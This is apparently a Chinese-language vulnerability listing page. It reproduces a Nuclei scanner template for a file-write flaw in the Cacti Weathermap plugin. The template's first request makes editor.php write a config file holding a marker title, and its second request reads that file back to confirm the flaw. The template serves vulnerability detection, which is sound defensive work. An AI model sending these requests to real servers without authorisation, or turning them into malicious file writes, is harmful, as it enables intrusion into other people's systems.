cacti-weathermap-file-write: Cacti Weathermap File Write

日期: 2025-08-01 | 影响软件: Cacti | POC: 已公开

漏洞描述

Cacti Weathermap (a plugin for Cacti, an open-source network monitoring and graphing tool) is vulnerable to file write.

PoC代码[已公开]

id: cacti-weathermap-file-write

info:
  name: Cacti Weathermap File Write
  author: pikpikcu
  severity: medium
  description: Cacti Weathermap (a plugin for Cacti, an open-source network monitoring and graphing tool) is vulnerable to file write.
  metadata:
    max-request: 2
  tags: injection,cacti

http:
  - method: GET
    path:
      - "{{BaseURL}}/plugins/weathermap/editor.php?plug=0&mapname=poc.conf&action=set_map_properties&param=&param2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7"

  - method: GET
    path:
      - "{{BaseURL}}/plugins/weathermap/configs/poc.conf"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "TITLE 46ea1712d4b13b55b3f680cc5b8b54e8"
        part: body

      - type: status
        status:
          - 200
# digest: 4a0a00473045022031e84e58740b1caeb267e3344e7d02a69bcc5a792e45d13f1c6a9d8ee214bd02022100a8f5f9bdf0713ed2ff97d57518b324a5167deb7008e172ea70ef2cd9d039b0bf:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/./http/vulnerabilities/other/cacti-weathermap-file-write.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐